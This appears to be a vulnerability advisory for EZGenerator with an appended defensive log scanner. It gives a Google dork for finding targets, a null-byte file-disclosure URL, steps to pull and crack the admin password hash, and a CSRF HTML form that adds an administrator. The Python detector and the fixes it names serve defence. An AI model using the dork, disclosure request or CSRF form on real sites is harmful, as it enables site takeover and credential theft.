EZGenerator Cross Site Request Forgery / File Disclosure

2014.01.09
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

EZGenerator - Local File Disclosure/Admin Data/CSRF Vulnerability
=================================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Dork : inurl:"utils.php?action=" inurl:"centraladmin.php?process="
(gR34?$ T0 mY L0V3)
####################################################################

===[ Exploit ]===

Local File Disclosure:
=====================
www.site.com/utils.php?action=download&filename=file.php%00

Admin Data
===========
1- Download centraladmin.php via the file disclosure exploit
   [www.site.com/utils.php?action=download&filename=centraladmin.php%00]
2- The downloaded file contains:
   $ca_admin_username="admin";
   $ca_admin_pwd="c89f9f4ef264e22001f9a9c3d72992ef";
3- Crack the hash and log in
4- Admin panel: www.site.com/centraladmin.php

CSRF [Add Admin]:
================
<html>
<body>
<form method="POST" name="form0" action="http://site/centraladmin.php?process=processuser">
<input type="hidden" name="flag" value="add"/>
<input type="hidden" name="old_username" value=""/>
<input type="hidden" name="username" value="admin"/>
<input type="hidden" name="name" value="mm"/>
<input type="hidden" name="sirname" value="hh"/>
<input type="hidden" name="email" value="email@live.com"/>
<input type="hidden" name="password" value="12121212"/>
<input type="hidden" name="repeatedpassword" value="12121212"/>
<input type="hidden" name="select_all" value="yes"/>
<input type="hidden" name="access_to_page47" value="2"/>
<input type="hidden" name="save" value="Save"/>
</form>
</body>
</html>

####################################################################
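For defenders, the two request patterns in this advisory can be picked out of web server access logs. The following is an added example, not part of the original advisory or of EZGenerator: it assumes combined-log-format lines and a site host name of `www.site.com`, and the sample log lines and finding labels are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined log format: "METHOD target PROTO" status size "referer" "agent"
LOG_RE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} \S+ "(?P<referer>[^"]*)"'
)
SITE_HOST = "www.site.com"  # assumption: host name the site is served under


def classify(line, site_host=SITE_HOST):
    """Return finding labels for one access-log line (empty list if clean)."""
    m = LOG_RE.search(line)
    if not m:
        return []
    url = urlsplit(m["target"])
    script = url.path.rsplit("/", 1)[-1].lower()
    # parse_qs percent-decodes values, so %00 becomes a literal NUL character.
    params = {k: v[-1] for k, v in parse_qs(url.query, keep_blank_values=True).items()}
    findings = []
    if script == "utils.php" and params.get("action") == "download":
        name = params.get("filename", "")
        if "\x00" in name:
            findings.append("nul-byte-in-filename")
        if name.split("\x00", 1)[0].lower().endswith(".php"):
            findings.append("php-source-download")
    if (script == "centraladmin.php" and m["method"] == "POST"
            and params.get("process") == "processuser"):
        # A missing or foreign Referer on the add-user endpoint is CSRF-suspicious.
        if urlsplit(m["referer"]).hostname != site_host:
            findings.append("cross-origin-admin-post")
    return findings


def scan(lines):
    """Return (line_number, findings) for every line with at least one finding."""
    return [(n, f) for n, f in ((i, classify(l)) for i, l in enumerate(lines, 1)) if f]


# Constructed sample input (addresses are from documentation ranges).
SAMPLE_LOG = [
    '203.0.113.5 - - [09/Jan/2014:10:00:00 +0000] "GET /utils.php?action=download&filename=centraladmin.php%00 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [09/Jan/2014:10:01:00 +0000] "GET /utils.php?action=download&filename=brochure.pdf HTTP/1.1" 200 90210 "http://www.site.com/" "Mozilla/5.0"',
    '198.51.100.9 - - [09/Jan/2014:10:02:00 +0000] "POST /centraladmin.php?process=processuser HTTP/1.1" 302 0 "http://other.example/page.html" "Mozilla/5.0"',
    '198.51.100.9 - - [09/Jan/2014:10:03:00 +0000] "POST /centraladmin.php?process=processuser HTTP/1.1" 302 0 "http://www.site.com/centraladmin.php" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for lineno, findings in scan(SAMPLE_LOG):
        print(lineno, ", ".join(findings))
```

The Referer check is a log-triage heuristic only; the fix for the CSRF itself is a per-session anti-CSRF token on the `processuser` form, and for the disclosure an allow-list of downloadable files.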

